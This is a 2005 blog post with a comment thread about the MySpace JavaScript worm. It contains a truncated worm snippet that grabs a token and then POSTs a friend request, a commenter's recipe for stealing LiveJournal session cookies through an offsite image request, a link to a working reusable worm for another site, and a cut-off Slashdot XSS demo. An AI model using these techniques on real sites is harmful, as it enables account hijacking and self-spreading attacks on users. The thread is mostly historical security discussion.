08:44 am, 13 Oct 05
myspace worm
MySpace worm using Javascript.
That post hypothesizes the problem is using GET instead of POST (both LJ and Orkut and many other apps did this), but it looks more complicated than that. Here's a reformatted snippet of the worm code, which looks like it GETs one page, retrieves a token from it, and then does the POST to actually make the change:
That post hypothesizes the problem is using GET instead of POST (both LJ and Orkut and many other apps did this), but it looks more complicated than that. Here's a reformatted snippet of the worm code, which looks like it GETs one page, retrieves a token from it, and then does the POST to actually make the change:
main(){
var AN=getClientFID();
var BH='/index.cfm?fuseaction=user.viewProfi
J=getXMLObj();
httpSend(BH,getHome,'GET');
xmlhttp2=getXMLObj();
httpSend2('/index.cfm?fuseaction=invite.a
function processxForm(){
if(xmlhttp2.readyState!=4){return}
var AU=xmlhttp2.responseText;
var AQ=getHiddenParameter(AU,'hashcode');
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['hashcode']=AQ;
AS['friendID']='11851658';
AS['submit']='Add to Friends';
httpSend2('/index.cfm?fuseaction=invite.a
}
-- Philipp, Google Blogoscoped
The default JS security model is to only allow it to access the properties of the site it's loaded from - http://www.mozilla.org/projects/security/components/jssec.html http://www.devarticles.com/c/a/JavaScript/JavaScript-Security/ and [javascript security model] give some more details.
Use Moz!!!
Re: Use Moz!!!
AJAX exploits
It's the new thing. If you can execute JS on a site, you can pretty much take over the entire browser. XMLHttpRequest can silently execute GET and POST requests with the server thinking it's just the user. And the user doesn't suspect a thing since it's all behind the scenes. For example, with LiveJournal, simply do a GET request to login.bml. Parse the login challenge authentication and other login variables. Do a POST to login.bml with this data, but make it so the session never expires and doesn't bind to the IP. Use getAllResponseHeaders to read the headers/cookie (so much for httpOnly cookies). Have JS load an offsite file (easily done with a new image src) with the cookie info added on. LJ account is now hijacked as long as the user doesn't hit log out. Of course, this only works if one hypothetically finds a way to get past cleanhtml.pl and let LJ display JS code.Re: AJAX exploits
It's happened before. The fixes are normally made quietly without much fanfare to give the clone sites a chance to upgrade before they get got. Fortunately, I don't think there's much left that hasn't been scrutinised and escaped or cleaned like crazy.
Re: AJAX exploits
Re: AJAX exploits
Re: AJAX exploits
Re: AJAX exploits
Re: AJAX exploits
Re: AJAX exploits
your in the news even
All I'll say is this.....
One you've been secondary /.'edTwo "When the bad guy can run code on your computer, it's not your computer anymore." You'd think they'd know that first you gotta assume that someone would have a compromisable browser and design web apps against it, and also some sanity checking of some sort, I mean should _SOMETHING_ have killed this worm when hit a few hundred users a sec, or hell just tens of users a sec. I'd personally say that Myspace is just as responsible.
Re: All I'll say is this.....
responsible for what? allowing the worm to spread? allowing security holes to exist? sounds like they had no power over the situation. I figure its pretty hard to notice somthing like that on a high-traffic site like mySpace, you see extra activity and you think "wow busy day today" not "oh crap a worm is eating my site" Thanks to Samy for alerting us all about this "undocumented feature" thanks to evan for the code, pretty simple for somthing that did so much. I'm glad it was harmless, i'm sure microsoft will come up with some token patch that "eliminates" (makes worse) this problem.:)
D
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Re: All I'll say is this.....
Soon
If they are smart they probably already started tightening some security... so yes the worm will probably be there soon too. ;-) ( I hate xanga)Re: Soon
xanga worm
Re: xanga worm
Re: xanga worm
Not first :)
I did this in August 2005 in our local (Latvian) "myspace" which has like 430k+ users, though I didn't release it (it worked), because I don't want new roommates.Here's the "worm" http://lethal.fabrika.lv/draugberts2.js You sent it in a message with a special tag (e.g. [div style="background-image:url(javascript:document.write(..))"]) and when people open the message it sends itself to someone else with random id.
It is made very understandably, so even people who don't know very much about JS or programming can edit it and use it somewhere else.
Re: Not first :)
i bet lativian myspace is horrible. you bunch of fat ass lazy DDoS kids.Re: Not first :)
Re: Not first :)
hi
loldongsRe: hi
rofldongszfomgpatched on site spaces
This vunerability was reported and patched on beerco's sitespaces.netIf anybody finds that it hasn't been sufficiently patched, please contact "tux" the linux penguin on the site and file a bug report
using javascript
The title of this post is correct. Many sites are calling this a cross site scripting worm. The worm used javascript, yes, but is not XSS. XSS is when the client sends the payload to the server and the server echos it back. This payload came from the server. I believe securityfocus and other sites referr to this as 'script injection'.Thought I'd clear this up before more "security professionals" start giving quotes on how dangerous XSS is and just end up looking like fools.
other possibilities
I remember writing a variant of this style of worm many years ago (note to evan: was mentioned to jeffro way back) using formatted http GET's to add a comment to the viewers own LJ using their logged in credentials.. embedding this link in a < i m g s r c = > tag.. the browser would auto get the url attempting to load an image.. at which point its executed and passing on the cookies and credentials of the user who attempted to load it..I was wise enough to know not to make it live thankfully..
Other variants of this style of attack come into play with firefox's prefetch tag.. originally (not sure if its still the same case) firefox used the same get code for prefetch as any normal request so cookies are indeed brought into the equation.. though it is never processed, so javascript would not be effective.. but any simple get request would be..
also of note with the prefetch tag.. it is possible to bypass many of the checks it performs on the type of request its making by using a pointer to a 302 redirect.. this is useful for 3rd party cookie cacheing.. (patched in IE post sp2, though still vulnerable in firefox the last i checked)..
with being able to direct users to urls of alternative sites and accessing non host site cookies you could jump sites with xss attacks.. might be an interesting concept..
most of these attacks all come down to the sites accepting input from GET as well as POST and not limiting input to POST..
-tom
Slashdot XSS Demo
The XSS hole in Slashdot (Slash: http://slashcode.com/) has since been closed but it serves as another demonstration of the same technique.
/******************************** /** http://www.zapthedingbat.com/ /******************************** var sUserAgent = navigator.userAgent.toLowerCase(); var isOpera = sUserAgent.indexOf("opera")!=-1; var isIe = sUserAgent.indexOf("msie")!=-1&&(document.all&&!isOpera); var isIe5 = sUserAgent.indexOf("msie 5")!=-1&&(document.all&&!isOpera); function newRequest(){ var oCtl = null; if (isIe){ var aProgIds = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP'); for (var i=0; i < aProgIds.length && (!oCtl); i++) { try{ oCtl = new ActiveXObject(aProgIds[i]); }catch(e){} } }else{ oCtl = new XMLHttpRequest(); } return oCtl; } function getFormKey(){ var oRequest = newRequest(); if (oRequest) { oRequest.open('GET', 'http://slashdot.org/journal.pl?op=edit', false); oRequest.setRequestHeader('Cookie', document.cookie); oRequest.setRequestHeader('Cookie', document.cookie); oRequest.setRequestHeader('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0)'); oRequest.setRequestHeader('Referer', 'http://slashdot.org/'); oRequest.send(null); var sResponse = oRequest.responseText; try{ return sResponse.match(/Re: Slashdot XSS Demo
So, I'm not a tech genius (which I guess makes me out of place here). I'm in a band. Was one of Myspace's first profiles. Tom (personally) deleted my account for "cheating" (I was running autorefresh in a frames page on a stock-traders' web refreshing site- - i know NADA about any of this stuff or code- - just looked up an already-existing tool on myspace and made my band number one for a while). Meanwhile, hack (non-)musicians like Tila Tequila and Jeffree Star were allowed to freely proliferate schlock and inflate their numbers. I guess 'cause she has big tits... but on the JS tip, 'no explaining the tranny with no talent and why he's allowed to cheat. I digress. Myspace is a great tool for musicians. Even if it's run by tools. If anyone would be willing to fill me in on how to surreptitiously buck the system and boost the hell out of my band profile views (i.e. get away with it without getting caught), i'd really appreciate. Would have to be for a tech-dummy. Step by step. my yahoo email is timj382thanks!
nah
where to paste the html code in myspace?Re: nah
f*cking kiddiewhere to paste the source code??
where to paste the source code??Re: where to paste the source code??
omg n00b hahagoogle is ur friend
yaaa
i luvv u!!Re: yaaa
how does this work. or does it even work anymore. if so someone help me out please. AIM: PimpNinjaClown Myspace or www.myspace.com/joshuatoddwww.myspace.com/lilyoungstaloc